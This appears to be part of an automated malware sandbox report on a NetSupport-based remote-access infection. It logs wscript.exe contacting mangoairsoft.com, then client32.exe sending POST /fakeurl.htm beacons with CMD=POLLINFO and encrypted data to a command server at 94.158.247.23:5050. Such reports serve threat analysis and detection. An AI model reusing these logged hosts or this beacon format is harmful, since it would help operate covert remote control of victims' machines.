                                                            Aug 2, 2023 10:13:02.797808886 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.797810078 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.797859907 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.820466995 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.820506096 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:03.714533091 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:03.714596987 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:03.714683056 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:03.884221077 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:03.884263992 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.010348082 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.010498047 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.013091087 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.013115883 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.013458014 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.020302057 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.062814951 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.187798977 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.187830925 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.187890053 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.188004971 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.188024044 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.188052893 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.188163996 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248081923 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248119116 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248214006 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248228073 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248321056 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248354912 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248399019 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248409033 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248425961 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248472929 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248497963 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248538017 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248578072 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248588085 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.248644114 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.248970032 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.305704117 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.305738926 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.305895090 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.305917025 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.305994987 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306024075 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306092024 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306102991 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306130886 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306179047 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306457996 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306484938 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306557894 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306566954 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306596994 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306627035 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306807041 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306829929 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306896925 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306907892 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.306950092 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.306981087 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.307199955 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.307228088 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.307284117 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.307293892 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.307336092 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.307360888 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.319749117 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.341536999 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.341572046 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.341680050 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.341694117 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.341767073 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.341795921 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.341852903 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.341862917 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.341876984 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.341906071 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.365540028 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.365570068 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.365649939 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.365667105 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366038084 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366075993 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.366096020 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366111994 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.366125107 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366164923 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.366189957 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.366525888 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366559029 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366604090 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.366617918 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.366641998 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.366683006 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.367058039 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.367085934 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.367139101 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.367155075 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.367183924 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.367209911 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.367517948 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.367551088 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.367599010 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.367611885 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.367643118 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.367667913 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.368021965 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.368046045 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.368103981 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.368118048 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.368149042 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.368177891 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.368562937 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.368590117 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.368642092 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.368654013 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.368678093 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.368702888 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.369059086 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.369086027 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.369136095 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.369147062 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.369175911 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.369203091 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.369609118 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.369637012 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.369724035 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.369736910 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.370074987 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.370126009 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.370167017 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.370181084 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.370201111 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.370220900 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399475098 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399513960 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399579048 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399593115 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399626017 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399638891 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399648905 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399656057 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399679899 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399691105 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399730921 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399738073 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399759054 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399775982 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399790049 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399810076 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399844885 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399852037 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.399879932 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.399900913 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428143024 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428189993 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428241968 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428255081 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428284883 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428308964 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428469896 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428495884 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428545952 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428555012 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428599119 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428670883 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428695917 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428746939 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428756952 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.428772926 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.428812027 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429035902 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429063082 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429126024 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429136038 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429177046 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429202080 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429243088 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429280043 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429326057 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429336071 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429366112 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429387093 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429430008 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429456949 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429501057 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429508924 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429544926 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429564953 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429693937 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429718971 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429766893 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429775000 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429805040 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429830074 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429867029 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429893017 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429935932 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429944038 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.429972887 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.429991961 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430051088 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430073977 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430119991 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430129051 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430208921 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430208921 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430250883 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430270910 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430320978 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430329084 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430356026 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430383921 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430421114 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430469036 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430485010 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430495024 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.430527925 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.430555105 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:04.431235075 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.442104101 CEST49700443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:04.442137003 CEST44349700188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.122106075 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.122176886 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.122277021 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.135257006 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.135310888 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.274595022 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.274698019 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.276599884 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.276622057 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.277180910 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.282215118 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.322804928 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.371243000 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.371332884 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:05.371391058 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.383197069 CEST49701443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:05.383238077 CEST44349701188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:13.407017946 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:13.579466105 CEST50504970294.158.247.23192.168.2.3
                                                            Aug 2, 2023 10:13:13.579590082 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:14.821124077 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:15.000080109 CEST50504970294.158.247.23192.168.2.3
                                                            Aug 2, 2023 10:13:15.040929079 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:18.292802095 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:18.467360020 CEST50504970294.158.247.23192.168.2.3
                                                            Aug 2, 2023 10:13:18.569168091 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:18.747426987 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:13:18.974533081 CEST50504970294.158.247.23192.168.2.3
                                                            Aug 2, 2023 10:13:19.946192980 CEST4970380192.168.2.362.172.138.67
                                                            Aug 2, 2023 10:13:19.988554001 CEST804970362.172.138.67192.168.2.3
                                                            Aug 2, 2023 10:13:19.988653898 CEST4970380192.168.2.362.172.138.67
                                                            Aug 2, 2023 10:13:20.125593901 CEST4970380192.168.2.362.172.138.67
                                                            Aug 2, 2023 10:13:20.176110983 CEST804970362.172.138.67192.168.2.3
                                                            Aug 2, 2023 10:13:20.176212072 CEST4970380192.168.2.362.172.138.67
                                                            Aug 2, 2023 10:14:18.678816080 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:14:18.913712025 CEST50504970294.158.247.23192.168.2.3
                                                            Aug 2, 2023 10:15:04.859472990 CEST4970380192.168.2.362.172.138.67
                                                            Aug 2, 2023 10:15:04.901523113 CEST804970362.172.138.67192.168.2.3
                                                            Aug 2, 2023 10:15:04.901627064 CEST4970380192.168.2.362.172.138.67
                                                            Aug 2, 2023 10:15:18.869443893 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:15:19.099231005 CEST50504970294.158.247.23192.168.2.3
                                                            Aug 2, 2023 10:16:18.944930077 CEST497025050192.168.2.394.158.247.23
                                                            Aug 2, 2023 10:16:19.177448034 CEST50504970294.158.247.23192.168.2.3

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 2, 2023 10:13:00.605271101 CEST5799053192.168.2.38.8.8.8
                                                            Aug 2, 2023 10:13:00.689363956 CEST53579908.8.8.8192.168.2.3
                                                            Aug 2, 2023 10:13:02.024280071 CEST5238753192.168.2.38.8.8.8
                                                            Aug 2, 2023 10:13:02.044745922 CEST53523878.8.8.8192.168.2.3
                                                            Aug 2, 2023 10:13:03.467876911 CEST5692453192.168.2.38.8.8.8
                                                            Aug 2, 2023 10:13:03.688536882 CEST53569248.8.8.8192.168.2.3
                                                            Aug 2, 2023 10:13:05.093127966 CEST6062553192.168.2.38.8.8.8
                                                            Aug 2, 2023 10:13:05.108136892 CEST53606258.8.8.8192.168.2.3
                                                            Aug 2, 2023 10:13:19.237552881 CEST4930253192.168.2.38.8.8.8
                                                            Aug 2, 2023 10:13:19.264784098 CEST53493028.8.8.8192.168.2.3

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Aug 2, 2023 10:13:00.605271101 CEST192.168.2.38.8.8.80x7560Standard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:02.024280071 CEST192.168.2.38.8.8.80x1cStandard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:03.467876911 CEST192.168.2.38.8.8.80xa999Standard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:05.093127966 CEST192.168.2.38.8.8.80x7428Standard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:19.237552881 CEST192.168.2.38.8.8.80x372fStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Aug 2, 2023 10:13:00.689363956 CEST8.8.8.8192.168.2.30x7560No error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:02.044745922 CEST8.8.8.8192.168.2.30x1cNo error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:03.688536882 CEST8.8.8.8192.168.2.30xa999No error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:05.108136892 CEST8.8.8.8192.168.2.30x7428No error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:19.264784098 CEST8.8.8.8192.168.2.30x372fNo error (0)geo.netsupportsoftware.comgeography.netsupportsoftware.comCNAME (Canonical name)IN (0x0001)false
                                                            Aug 2, 2023 10:13:19.264784098 CEST8.8.8.8192.168.2.30x372fNo error (0)geography.netsupportsoftware.com62.172.138.67A (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:19.264784098 CEST8.8.8.8192.168.2.30x372fNo error (0)geography.netsupportsoftware.com62.172.138.8A (IP address)IN (0x0001)false
                                                            Aug 2, 2023 10:13:19.264784098 CEST8.8.8.8192.168.2.30x372fNo error (0)geography.netsupportsoftware.com51.142.119.24A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • mangoairsoft.com
                                                            • 94.158.247.23connection: keep-alivecmd=pollinfo=1ack=1
                                                            • 94.158.247.23connection: keep-alivecmd=encdes=1data=u2hr4]%y-=id3wi7?=@ff&t[6ral=i7e{yb\m#rtr5=ifl{mqyz8 6v{rx\@q=j=js:x>w~k=n+|*9w_z8a ]
                                                            • 94.158.247.23connection: keep-alivecmd=encdes=1data=l3<(t{evk9|||$(m$c=m~sm?sq
                                                            • geo.netsupportsoftware.com
                                                            • 94.158.247.23connection: keep-alivecmd=encdes=1data=#mhuaag

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.349698188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.349699188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.349700188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.349701188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.34970294.158.247.235050C:\ProgramData\client32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Aug 2, 2023 10:13:14.821124077 CEST2910OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.247.23Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                            Data Raw:
                                                            Data Ascii:
                                                            Aug 2, 2023 10:13:15.000080109 CEST2910INHTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 60Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \Wbb)w}oXxf
                                                            Data Raw:
                                                            Data Ascii:
                                                            Aug 2, 2023 10:13:18.292802095 CEST2911OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 235Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raL=I7E{yb\m#rtr5=Ifl{MQYz8 6V{rX\@Q=J=JS:X>w~k=n+|*9W_z8A ]
                                                            Data Raw:
                                                            Data Ascii:
